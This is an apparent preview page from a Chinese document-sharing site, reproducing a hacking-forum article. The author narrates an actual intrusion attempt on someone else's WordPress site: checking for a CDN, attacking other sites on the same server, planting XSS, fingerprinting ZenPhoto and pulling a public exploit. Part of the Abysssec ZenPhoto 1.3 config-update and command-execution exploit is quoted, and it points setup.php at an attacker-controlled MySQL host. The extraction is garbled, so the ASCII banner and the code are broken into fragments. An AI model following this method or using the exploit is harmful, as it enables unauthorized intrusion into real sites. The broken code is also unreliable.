[法客周年庆]无尽的提权

[法客周年庆]无尽的提权

ID:9880991

大小:2.02 MB

页数:22页

时间:2018-05-13

[法客周年庆]无尽的提权_第1页
[法客周年庆]无尽的提权_第2页
[法客周年庆]无尽的提权_第3页
[法客周年庆]无尽的提权_第4页
[法客周年庆]无尽的提权_第5页
资源描述:

《[法客周年庆]无尽的提权》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、《边干边写---重要的是思路》由于一直在忙工作,很久很久没写东西了,但是为了法克周年庆。(庆祝杨凡被爆菊花三周年纪念日)还是写一篇吧。很多好的文章由于一些原因不能写出来。大家将就下。而且本人有拖延症。我敢说,我弄下之后就会懒得写文章。所以边日边写吧;D收集了下目标信息。神器WhatWeb看到的Wordpress的而且版本略高。切由于工作性质特殊。估计直接从插件下手的机会不大。果断决定从旁注入手先分析一下目标的操作系统和是否有CDN。先分享下我探测目标是否有Cdn的方法。http://www.webkaka.com/webCheck.aspx

2、在这个地方给网站测速。可以显示各地的机房ping目标的ip。(打码真累)了解cdn的同学一看就知道了。99%是没有的。估计是国外的虚拟主机。或者服务器。这样的话。至少知道在同一台机器上了。可以开始看看旁注。运气好的话是可以把目标干下来的。探测目标操作系统的方法也很简单。大小写。大家都懂的在旁注一站点上看到了这样一个页面。然后决定先打个xss进去看看这里用的端是xss.la的wooyun有号的朋友可以在wooyun集市里购花50WB购买邀请码这里只是写个思路。不一定会成功。看到这里,能看出来是一个老外给自己的儿子搞的网站(老外真欢乐)。继续看

3、能不能找到这套系统的资料然后进一步下手。在域名后面加个/admin跳转到了这个地方。从这里可以看到。这套系统叫做ZenPhoto。把admin.php换成admin.phP后发现文件不存在。从这里可以知道。目标系统非windows奉献给搞国外站的基友们一个和exploit-db类似的网站"http://www.exploitsdownload.com"查询下看看有没有神马漏洞。这种时候要是能找到目标用的程序的版本。会更加的方便查询后看到这样一个exp

4、/

5、/__/

6、

7、

8、

9、_

10、/

11、

12、

13、

14、/

15、

16、

17、

18、

19、

20、_)

21、

22、

23、/

24、

25、

26、

27、

28、//\

29、

30、

31、

32、_<

33、

34、

35、

36、

37、__

38、/____

39、__

40、

41、

42、_)

43、

44、_

45、

46、_

47、____/_/_____/

48、____/http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/AbysssecIncPublicAdvisoryTitle:ZenphotoConfigUpdateandCommandExecuteVulnerabilityAffectedVersion:Zenpho

49、to<=1.3Discovery:www.abysssec.comVendor:http://www.zenphoto.org*/$path="http://www.site.com/zenphoto"."/"."zp-core/setup.php";$new_mysql_user="abysssec";$new_mysql_pass="absssec";$new_mysql_host="abysssec.com";$new_mysql_database="abysssec_database";$new_mysql_prefix="zp_"

50、;echo"";echo"ZenPhotoImageGallery1.3ResetadminPassword
By:Abysssec@Inc
www.Abysssec.com


51、mysql_user'value='$new_mysql_user'>

52、efix'>Afterclickonbelow,iftargetwillcanconnecttoyourMysql_Host:
YouMustview'GO!'Messeg

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。